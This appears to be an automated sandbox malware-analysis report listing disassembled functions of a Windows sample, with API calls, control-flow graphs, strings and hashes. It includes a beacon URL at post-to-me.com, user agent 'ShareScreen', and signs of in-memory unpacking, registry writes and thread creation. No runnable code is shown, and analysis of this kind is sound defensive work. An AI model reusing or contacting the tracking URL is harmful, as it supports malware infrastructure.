                                                                                    Function 007FA24E Relevance: 3.0, APIs: 2, Instructions: 41processCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 007FA276
                                                                                    • Module32First.KERNEL32(00000000,00000224), ref: 007FA296
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174565055.00000000007F9000.00000040.00000020.00020000.00000000.sdmp, Offset: 007F9000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7f9000_jicQJ2cdlM.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CreateFirstModule32SnapshotToolhelp32
                                                                                    • String ID:
                                                                                    • API String ID: 3833638111-0
                                                                                    • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                    • Instruction ID: e7fb7523b8803fe30d3d9a9553e2399dbc976e6eb7a07e132c1604f41b1245bb
                                                                                    • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                    • Instruction Fuzzy Hash: E1F06275200718BBD7202BF5988DB7A77E8BF89724F100529F746D12C0DB79EC454A62
                                                                                    Function 007F91A4 Relevance: 1.2, Instructions: 1163COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174565055.00000000007F9000.00000040.00000020.00020000.00000000.sdmp, Offset: 007F9000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7f9000_jicQJ2cdlM.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: cd0bb62a69ec7605012e64fce1928872f0838fcd369f9a9d4524d6f5a1ea6748
                                                                                    • Instruction ID: 7d5e278c5d6dbdba4e1c46090711187a2bf961df14eec7574d7aa88d6bd66561
                                                                                    • Opcode Fuzzy Hash: cd0bb62a69ec7605012e64fce1928872f0838fcd369f9a9d4524d6f5a1ea6748
                                                                                    • Instruction Fuzzy Hash: 50A2419684E7C85FEB239B341C6A6A13F70AE23214B0E44DBC6D5CF2A3E14C5919D727
                                                                                    Function 00432F49 Relevance: 13.8, APIs: 9, Instructions: 300COMMONLIBRARYCODE
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 74 432f49-432f59 75 432f73-432f75 74->75 76 432f5b-432f6e call 42ead6 call 42eae9 74->76 78 432f7b-432f81 75->78 79 4332dd-4332ea call 42ead6 call 42eae9 75->79 90 4332f5 76->90 78->79 82 432f87-432fb2 78->82 96 4332f0 call 42a5bd 79->96 82->79 85 432fb8-432fc1 82->85 88 432fc3-432fd6 call 42ead6 call 42eae9 85->88 89 432fdb-432fdd 85->89 88->96 93 432fe3-432fe7 89->93 94 4332d9-4332db 89->94 95 4332f8-4332fd 90->95 93->94 98 432fed-432ff1 93->98 94->95 96->90 98->88 99 432ff3-43300a 98->99 102 433027-433030 99->102 103 43300c-43300f 99->103 107 433032-433049 call 42ead6 call 42eae9 call 42a5bd 102->107 108 43304e-433058 102->108 105 433011-433017 103->105 106 433019-433022 103->106 105->106 105->107 109 4330c3-4330dd 106->109 139 433210 107->139 111 43305a-43305c 108->111 112 43305f-43307d call 4336c7 call 43348a * 2 108->112 114 4330e3-4330f3 109->114 115 4331b1-4331ba call 43d385 109->115 111->112 143 43309a-4330c0 call 43480e 112->143 144 43307f-433095 call 42eae9 call 42ead6 112->144 114->115 120 4330f9-4330fb 114->120 128 43322d 115->128 129 4331bc-4331ce 115->129 120->115 121 433101-433127 120->121 121->115 125 43312d-433140 121->125 125->115 130 433142-433144 125->130 132 433231-433249 ReadFile 128->132 129->128 134 4331d0-4331df GetConsoleMode 129->134 130->115 135 433146-433171 130->135 137 4332a5-4332b0 GetLastError 132->137 138 43324b-433251 132->138 134->128 140 4331e1-4331e5 134->140 135->115 142 433173-433186 135->142 145 4332b2-4332c4 call 42eae9 call 42ead6 137->145 146 4332c9-4332cc 137->146 138->137 147 433253 138->147 141 433213-43321d call 43348a 139->141 140->132 148 4331e7-433201 ReadConsoleW 140->148 141->95 142->115 150 433188-43318a 142->150 143->109 144->139 145->139 157 4332d2-4332d4 146->157 158 433209-43320f call 42eab3 146->158 154 433256-433268 147->154 155 433203 GetLastError 148->155 156 433222-43322b 148->156 150->115 161 43318c-4331ac 150->161 154->141 165 43326a-43326e 154->165 155->158 156->154 157->141 158->139 161->115 169 433270-433280 call 432c65 165->169 170 433287-433292 165->170 179 433283-433285 169->179 171 433294 call 432db5 170->171 172 43329e-4332a3 call 432aa5 170->172 180 433299-43329c 171->180 172->180 179->141 180->179
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_jicQJ2cdlM.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: bf5b903c5d4d7d43f3395e6d2b0615cff82c67b54ffa341e922cfa30cc62cd86
                                                                                    • Instruction ID: d6ce50a492f9084338ba33edda2eca6d731db0489828e8dd55d9f9b17e416b32
                                                                                    • Opcode Fuzzy Hash: bf5b903c5d4d7d43f3395e6d2b0615cff82c67b54ffa341e922cfa30cc62cd86
                                                                                    • Instruction Fuzzy Hash: 6EC11370E04245AFDB11DFA9D841BAFBBB0BF0D305F08119AE815A7392C3789A41CB69
                                                                                    Function 0043D05C Relevance: 13.8, APIs: 9, Instructions: 272COMMONLIBRARYCODE
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 182 43d05c-43d08c call 43cdbf 185 43d0a7-43d0b3 call 43979e 182->185 186 43d08e-43d099 call 42ead6 182->186 192 43d0b5-43d0ca call 42ead6 call 42eae9 185->192 193 43d0cc-43d115 call 43cd2a 185->193 191 43d09b-43d0a2 call 42eae9 186->191 202 43d37e-43d384 191->202 192->191 200 43d182-43d18b GetFileType 193->200 201 43d117-43d120 193->201 206 43d1d4-43d1d7 200->206 207 43d18d-43d1be GetLastError call 42eab3 CloseHandle 200->207 204 43d122-43d126 201->204 205 43d157-43d17d GetLastError call 42eab3 201->205 204->205 211 43d128-43d155 call 43cd2a 204->211 205->191 209 43d1e0-43d1e6 206->209 210 43d1d9-43d1de 206->210 207->191 221 43d1c4-43d1cf call 42eae9 207->221 214 43d1ea-43d238 call 4396e7 209->214 215 43d1e8 209->215 210->214 211->200 211->205 225 43d23a-43d246 call 43cf3b 214->225 226 43d248-43d26c call 43cadd 214->226 215->214 221->191 225->226 231 43d270-43d27a call 4335ed 225->231 232 43d27f-43d2c2 226->232 233 43d26e 226->233 231->202 235 43d2e3-43d2f1 232->235 236 43d2c4-43d2c8 232->236 233->231 239 43d2f7-43d2fb 235->239 240 43d37c 235->240 236->235 238 43d2ca-43d2de 236->238 238->235 239->240 241 43d2fd-43d330 CloseHandle call 43cd2a 239->241 240->202 244 43d332-43d35e GetLastError call 42eab3 call 4398b0 241->244 245 43d364-43d378 241->245 244->245 245->240
                                                                                    APIs
                                                                                      • Part of subcall function 0043CD2A: CreateFileW.KERNEL32(00000000,00000000,?,0043D105,?,?,00000000,?,0043D105,00000000,0000000C), ref: 0043CD47
                                                                                    • GetLastError.KERNEL32 ref: 0043D170
                                                                                    • __dosmaperr.LIBCMT ref: 0043D177
                                                                                    • GetFileType.KERNEL32(00000000), ref: 0043D183
                                                                                    • GetLastError.KERNEL32 ref: 0043D18D
                                                                                    • __dosmaperr.LIBCMT ref: 0043D196
                                                                                    • CloseHandle.KERNEL32(00000000), ref: 0043D1B6
                                                                                    • CloseHandle.KERNEL32(?), ref: 0043D300
                                                                                    • GetLastError.KERNEL32 ref: 0043D332
                                                                                    • __dosmaperr.LIBCMT ref: 0043D339
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_jicQJ2cdlM.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                                    • String ID:
                                                                                    • API String ID: 4237864984-0
                                                                                    • Opcode ID: 333ff1eee16b6be64793bd318ad3fa05ede6171504cd334b681c7e0d8fb5623c
                                                                                    • Instruction ID: 006e68bf3f1d2291baca7e3f3ccd15ce7d6f583b40adfd1c0386b5d8b5644812
                                                                                    • Opcode Fuzzy Hash: 333ff1eee16b6be64793bd318ad3fa05ede6171504cd334b681c7e0d8fb5623c
                                                                                    • Instruction Fuzzy Hash: 70A13632E101049FDF19AF68EC917AE7BA0AF0A324F14115EF805AB3D1D7389D12CB5A
                                                                                    Function 009E003C Relevance: 12.8, APIs: 5, Strings: 2, Instructions: 515memoryCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 250 9e003c-9e0047 251 9e004c-9e0263 call 9e0a3f call 9e0e0f call 9e0d90 VirtualAlloc 250->251 252 9e0049 250->252 267 9e028b-9e0292 251->267 268 9e0265-9e0289 call 9e0a69 251->268 252->251 270 9e02a1-9e02b0 267->270 272 9e02ce-9e03c2 VirtualProtect call 9e0cce call 9e0ce7 268->272 270->272 273 9e02b2-9e02cc 270->273 279 9e03d1-9e03e0 272->279 273->270 280 9e0439-9e04b8 VirtualFree 279->280 281 9e03e2-9e0437 call 9e0ce7 279->281 282 9e04be-9e04cd 280->282 283 9e05f4-9e05fe 280->283 281->279 286 9e04d3-9e04dd 282->286 287 9e077f-9e0789 283->287 288 9e0604-9e060d 283->288 286->283 292 9e04e3-9e0505 LoadLibraryA 286->292 290 9e078b-9e07a3 287->290 291 9e07a6-9e07b0 287->291 288->287 293 9e0613-9e0637 288->293 290->291 294 9e086e-9e08be LoadLibraryA 291->294 295 9e07b6-9e07cb 291->295 296 9e0517-9e0520 292->296 297 9e0507-9e0515 292->297 298 9e063e-9e0648 293->298 302 9e08c7-9e08f9 294->302 299 9e07d2-9e07d5 295->299 300 9e0526-9e0547 296->300 297->300 298->287 301 9e064e-9e065a 298->301 303 9e07d7-9e07e0 299->303 304 9e0824-9e0833 299->304 305 9e054d-9e0550 300->305 301->287 306 9e0660-9e066a 301->306 307 9e08fb-9e0901 302->307 308 9e0902-9e091d 302->308 309 9e07e4-9e0822 303->309 310 9e07e2 303->310 314 9e0839-9e083c 304->314 311 9e0556-9e056b 305->311 312 9e05e0-9e05ef 305->312 313 9e067a-9e0689 306->313 307->308 309->299 310->304 315 9e056f-9e057a 311->315 316 9e056d 311->316 312->286 317 9e068f-9e06b2 313->317 318 9e0750-9e077a 313->318 314->294 319 9e083e-9e0847 314->319 321 9e057c-9e0599 315->321 322 9e059b-9e05bb 315->322 316->312 323 9e06ef-9e06fc 317->323 324 9e06b4-9e06ed 317->324 318->298 325 9e084b-9e086c 319->325 326 9e0849 319->326 333 9e05bd-9e05db 321->333 322->333 327 9e06fe-9e0748 323->327 328 9e074b 323->328 324->323 325->314 326->294 327->328 328->313 333->305
                                                                                    APIs
                                                                                    • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 009E024D
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174782860.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_9e0000_jicQJ2cdlM.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: AllocVirtual
                                                                                    • String ID: cess$kernel32.dll
                                                                                    • API String ID: 4275171209-1230238691
                                                                                    • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                    • Instruction ID: f5a3dc62cdc7acb52c977fcb413e7c7b233ed43874cc1a3f8a902debe43d26ff
                                                                                    • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                    • Instruction Fuzzy Hash: A6528874A00269DFDB65CF59C984BA8BBB1BF49304F1480D9E94DAB351DB70AE84DF10
                                                                                    Function 00402C24 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 185networkCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    • InternetOpenW.WININET(ShareScreen,00000000,00000000,00000000,00000000), ref: 00402C47
                                                                                      • Part of subcall function 004010BA: _wcslen.LIBCMT ref: 004010C1
                                                                                      • Part of subcall function 004010BA: _wcslen.LIBCMT ref: 004010DD
                                                                                    • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 00402E5F
                                                                                    • InternetCloseHandle.WININET(00000000), ref: 00402E70
                                                                                    • InternetCloseHandle.WININET(00000000), ref: 00402E73
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_jicQJ2cdlM.jbxd
                                                                                    Similarity
                                                                                    • API ID: Internet$CloseHandleOpen_wcslen
                                                                                    • String ID: &cc=DE$ShareScreen$https://post-to-me.com/track_prt.php?sub=
                                                                                    • API String ID: 3067768807-1501832161
                                                                                    • Opcode ID: a8bec4743929572fb9f32f475d47f4abd6f055372441a00394d7fc50db865c55
                                                                                    • Instruction ID: 48789f1b3701ba946f3e6b41f8bd096f2728906552624118b4e60daa7bc135c0
                                                                                    • Opcode Fuzzy Hash: a8bec4743929572fb9f32f475d47f4abd6f055372441a00394d7fc50db865c55
                                                                                    • Instruction Fuzzy Hash: 89516095A65344A8E320EFB0BC52F363378EF58712F10643BE518CB2B2E3B59944875E
                                                                                    Function 004051F5 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 82COMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_jicQJ2cdlM.jbxd
                                                                                    Similarity
                                                                                    • API ID: Cnd_initstd::_$Cnd_waitMtx_initThrd_start
                                                                                    • String ID: %X@
                                                                                    • API String ID: 1687354797-3313093589
                                                                                    • Opcode ID: 0ea570f09f259dfbc3d5b47f4c5eb340c08c0aee3b3523c1dfd7de2be87ac1a9
                                                                                    • Instruction ID: b3e9ac138a89c9aab4b32a44e65933d882eee500b320c13cfd578e42c41f9d09
                                                                                    • Opcode Fuzzy Hash: 0ea570f09f259dfbc3d5b47f4c5eb340c08c0aee3b3523c1dfd7de2be87ac1a9
                                                                                    • Instruction Fuzzy Hash: 3D214172C042499ADF15EBE9D881BDEB7F8AF08318F14407FE504B72C1DB7D99488A69
                                                                                    Function 0042DFE0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 38threadCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    • GetLastError.KERNEL32(00457910,00000010,00000003,00431F7D), ref: 0042DFF3
                                                                                    • ExitThread.KERNEL32 ref: 0042DFFA
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_jicQJ2cdlM.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorExitLastThread
                                                                                    • String ID: 11@$f(@
                                                                                    • API String ID: 1611280651-1277599000
                                                                                    • Opcode ID: 05a6bf9322938420f326034e00ba90610ba59fb7b5f4eb19846d64da3dd64c95
                                                                                    • Instruction ID: 8ccfe30e394ff3a7da82f1aad20c2a43f0afb1cc8a6867a0b2db1ae1affa3120
                                                                                    • Opcode Fuzzy Hash: 05a6bf9322938420f326034e00ba90610ba59fb7b5f4eb19846d64da3dd64c95
                                                                                    • Instruction Fuzzy Hash: 5BF0C874600624AFDB04AFB1D80ABAD3B70FF49715F10056EF4055B392CB796955CB68
                                                                                    Function 00405825 Relevance: 6.0, APIs: 4, Instructions: 29COMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    • std::_Cnd_initX.LIBCPMT ref: 00405841
                                                                                    • __Cnd_signal.LIBCPMT ref: 0040584D
                                                                                    • std::_Cnd_initX.LIBCPMT ref: 00405862
                                                                                    • __Cnd_do_broadcast_at_thread_exit.LIBCPMT ref: 00405869
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_jicQJ2cdlM.jbxd
                                                                                    Similarity
                                                                                    • API ID: Cnd_initstd::_$Cnd_do_broadcast_at_thread_exitCnd_signal
                                                                                    • String ID:
                                                                                    • API String ID: 2059591211-0
                                                                                    • Opcode ID: 16e91ae191353f76377487b504f8ad98fae09f0c97f906459e9bfe3258fa4ce0
                                                                                    • Instruction ID: d72f8bc51fec51febc5e3899202a3526e07d3a061d0a8301a91111c4e624332c
                                                                                    • Opcode Fuzzy Hash: 16e91ae191353f76377487b504f8ad98fae09f0c97f906459e9bfe3258fa4ce0
                                                                                    • Instruction Fuzzy Hash: 20F0A7714007009BE7317762C817B0A77A0AF0031DF10883FF15A769E2CF7DA8544A5D
                                                                                    Function 00402980 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49COMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 435 402980-4029eb call 426850 call 42a36b call 42b474 call 402843 444 4029f9-402a13 call 404358 call 40f8f4 435->444 445 4029ed-4029f0 435->445 445->444 446 4029f2-4029f6 445->446 446->444 448 4029f8 446->448 448->444
                                                                                    APIs
                                                                                    • _wcslen.LIBCMT ref: 004029AF
                                                                                    • __fassign.LIBCMT ref: 004029BF
                                                                                      • Part of subcall function 00402843: std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00402926
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_jicQJ2cdlM.jbxd
                                                                                    Similarity
                                                                                    • API ID: Ios_base_dtor__fassign_wcslenstd::ios_base::_
                                                                                    • String ID: 4+@
                                                                                    • API String ID: 2843524283-3700369575
                                                                                    • Opcode ID: d6927ac8dcf44b0011b1dce344e42bafe9dfab0a11997840a9f38d6492e0eb02
                                                                                    • Instruction ID: 257e808548a25f0c421a3fe296c20495207b494aef35f76eb7bec397418e7454
                                                                                    • Opcode Fuzzy Hash: d6927ac8dcf44b0011b1dce344e42bafe9dfab0a11997840a9f38d6492e0eb02
                                                                                    • Instruction Fuzzy Hash: 1801F9B1E0021C5ADB24FA25EC46BEF7768AB41304F0402FFA705E31C1D9785E45CA88
                                                                                    Function 0042E134 Relevance: 4.6, APIs: 3, Instructions: 54threadCOMMONLIBRARYCODE
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 452 42e134-42e13f 453 42e141-42e153 call 42eae9 call 42a5bd 452->453 454 42e155-42e168 call 42e0eb 452->454 466 42e1a5-42e1a8 453->466 460 42e196 454->460 461 42e16a-42e187 CreateThread 454->461 465 42e198-42e1a4 call 42e05d 460->465 463 42e1a9-42e1ae 461->463 464 42e189-42e195 GetLastError call 42eab3 461->464 469 42e1b0-42e1b3 463->469 470 42e1b5-42e1b7 463->470 464->460 465->466 469->470 470->465
                                                                                    APIs
                                                                                    • CreateThread.KERNEL32(?,?,Function_0002DFE0,00000000,?,?), ref: 0042E17D
                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,0040CF33,00000000,00000000,?,?,00000000,?), ref: 0042E189
                                                                                    • __dosmaperr.LIBCMT ref: 0042E190
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_jicQJ2cdlM.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateErrorLastThread__dosmaperr
                                                                                    • String ID:
                                                                                    • API String ID: 2744730728-0
                                                                                    • Opcode ID: f788247bfe16cd787040539d6f1c9311eafedbd5b023f877c643640da45ad27a
                                                                                    • Instruction ID: e33ff4e630afc97a712763e24a24b73512c1ee0121ef7b9dc61686095db8a569
                                                                                    • Opcode Fuzzy Hash: f788247bfe16cd787040539d6f1c9311eafedbd5b023f877c643640da45ad27a
                                                                                    • Instruction Fuzzy Hash: 7F01D236600229ABDB119FA3FC05AAF3B69EF81360F50013AF91582210DB358921DBA8
                                                                                    Function 00434775 Relevance: 4.6, APIs: 3, Instructions: 50COMMONLIBRARYCODE
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 473 434775-43478d call 439941 476 4347a0-4347b6 SetFilePointerEx 473->476 477 43478f-434794 call 42eae9 473->477 479 4347c7-4347d1 476->479 480 4347b8-4347c5 GetLastError call 42eab3 476->480 482 43479a-43479e 477->482 481 4347d3-4347e8 479->481 479->482 480->482 485 4347ed-4347f2 481->485 482->485
                                                                                    APIs
                                                                                    • SetFilePointerEx.KERNEL32(00000000,00000000,0040DDFA,00000000,00000002,0040DDFA,00000000,?,?,?,00434824,00000000,00000000,0040DDFA,00000002), ref: 004347AE
                                                                                    • GetLastError.KERNEL32(?,00434824,00000000,00000000,0040DDFA,00000002,?,0042C181,?,00000000,00000000,00000001,?,0040DDFA,?,0042C236), ref: 004347B8
                                                                                    • __dosmaperr.LIBCMT ref: 004347BF
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_jicQJ2cdlM.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorFileLastPointer__dosmaperr
                                                                                    • String ID:
                                                                                    • API String ID: 2336955059-0
                                                                                    • Opcode ID: 0f8939188b6fdc8a7da50d1b405e1129083f9e2b96a50d0a3cd5949e7845d65d
                                                                                    • Instruction ID: 3f4161a45120eee3ca6c804ab5e0c8b7ff266a4415271cac2496bd2984e95623
                                                                                    • Opcode Fuzzy Hash: 0f8939188b6fdc8a7da50d1b405e1129083f9e2b96a50d0a3cd5949e7845d65d
                                                                                    • Instruction Fuzzy Hash: CC016836610114ABCB159FAADC058EF7B29EFCA730F24030AF814872C0EB74AD418794
                                                                                    Function 00402BCD Relevance: 4.5, APIs: 3, Instructions: 41registryCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 487 402bcd-402bf9 RegCreateKeyExW 488 402bfb-402c0d RegSetValueExW 487->488 489 402c0f-402c12 487->489 488->489 490 402c14-402c17 RegCloseKey 489->490 491 402c1d-402c23 489->491 490->491
                                                                                    APIs
                                                                                    • RegCreateKeyExW.KERNEL32(80000001,?,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 00402BEF
                                                                                    • RegSetValueExW.KERNEL32(?,?,00000000,00000001,?,00000004,?,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 00402C07
                                                                                    • RegCloseKey.ADVAPI32(?,?,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 00402C17
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_jicQJ2cdlM.jbxd
                                                                                    Similarity
                                                                                    • API ID: CloseCreateValue
                                                                                    • String ID:
                                                                                    • API String ID: 1818849710-0
                                                                                    • Opcode ID: 17a0f39c5dea863e0681c067e94205fb1cf9212befe975e377a74504568b03c9
                                                                                    • Instruction ID: 5f9d8f05081ab8e61a544dd9ed380a1f0a89feb258115cbe41ff1dcf5e2af099
                                                                                    • Opcode Fuzzy Hash: 17a0f39c5dea863e0681c067e94205fb1cf9212befe975e377a74504568b03c9
                                                                                    • Instruction Fuzzy Hash: 75F0B4B650011CFFEB214F94DD89DAFBA7CEB417E9F100175FA01B2150D6B14E009664
                                                                                    Function 0042E094 Relevance: 4.5, APIs: 3, Instructions: 31threadCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 492 42e094-42e0a1 call 431f7e 495 42e0a3-42e0a6 ExitThread 492->495 496 42e0ac-42e0b4 492->496 496->495 497 42e0b6-42e0ba 496->497 498 42e0c1-42e0c7 497->498 499 42e0bc call 435516 497->499 501 42e0d4-42e0da 498->501 502 42e0c9-42e0cb 498->502 499->498 501->495 504 42e0dc-42e0de 501->504 502->501 503 42e0cd-42e0ce CloseHandle 502->503 503->501 504->495 505 42e0e0-42e0ea FreeLibraryAndExitThread 504->505
                                                                                    APIs
                                                                                      • Part of subcall function 00431F7E: GetLastError.KERNEL32(?,?,?,0042EAEE,00434D9C,?,00431F28,00000001,00000364,?,0042E005,00457910,00000010), ref: 00431F83
                                                                                      • Part of subcall function 00431F7E: _free.LIBCMT ref: 00431FB8
                                                                                      • Part of subcall function 00431F7E: SetLastError.KERNEL32(00000000), ref: 00431FEC
                                                                                    • ExitThread.KERNEL32 ref: 0042E0A6
                                                                                    • CloseHandle.KERNEL32(?,?,?,0042E1C6,?,?,0042E03D,00000000), ref: 0042E0CE
                                                                                    • FreeLibraryAndExitThread.KERNEL32(?,?,?,?,0042E1C6,?,?,0042E03D,00000000), ref: 0042E0E4
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_jicQJ2cdlM.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorExitLastThread$CloseFreeHandleLibrary_free
                                                                                    • String ID:
                                                                                    • API String ID: 1198197534-0
                                                                                    • Opcode ID: 358fd455719f577d8bc93a3d3127ed53d65e98e9d00355e3dd6338ab7ece4e02
                                                                                    • Instruction ID: 02d263aed51cb6b3bee4cffa2fb4446158e609bbc081d0db7e94150c61e2e04c
                                                                                    • Opcode Fuzzy Hash: 358fd455719f577d8bc93a3d3127ed53d65e98e9d00355e3dd6338ab7ece4e02
                                                                                    • Instruction Fuzzy Hash: 8FF05E302006347BDB356F27E808A5B3AA8AF05764F484726B924C37A1D7B8DD828698
                                                                                    Function 0043CFEB Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 36COMMONLIBRARYCODE
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 506 43cfeb-43d005 call 43f961 509 43d007-43d00a 506->509 510 43d00c-43d024 call 43d05c 506->510 511 43d038-43d03b 509->511 513 43d029-43d037 call 43348a 510->513 513->511
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_jicQJ2cdlM.jbxd
                                                                                    Similarity
                                                                                    • API ID: _free
                                                                                    • String ID: 'C
                                                                                    • API String ID: 269201875-3508614867
                                                                                    • Opcode ID: dcff01ba0718bc25fbadba801be0e76f759b5211c2d86b2f90a3e61a906836b7
                                                                                    • Instruction ID: ac23cf383b269f77c0b068b48fc7cf8c71372a03a023b6a8bdb9567da4463856
                                                                                    • Opcode Fuzzy Hash: dcff01ba0718bc25fbadba801be0e76f759b5211c2d86b2f90a3e61a906836b7
                                                                                    • Instruction Fuzzy Hash: D0F09A32810008BBCF155E96EC01DDF3B6AEF89338F10115AFA1492150DA3A8A22ABA4
                                                                                    Function 004023BA Relevance: 3.1, APIs: 2, Instructions: 129windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • DefWindowProcW.USER32(?,?,?,?), ref: 004023E1
                                                                                    • PostQuitMessage.USER32(00000000), ref: 00402583
                                                                                    Memory Dump Source
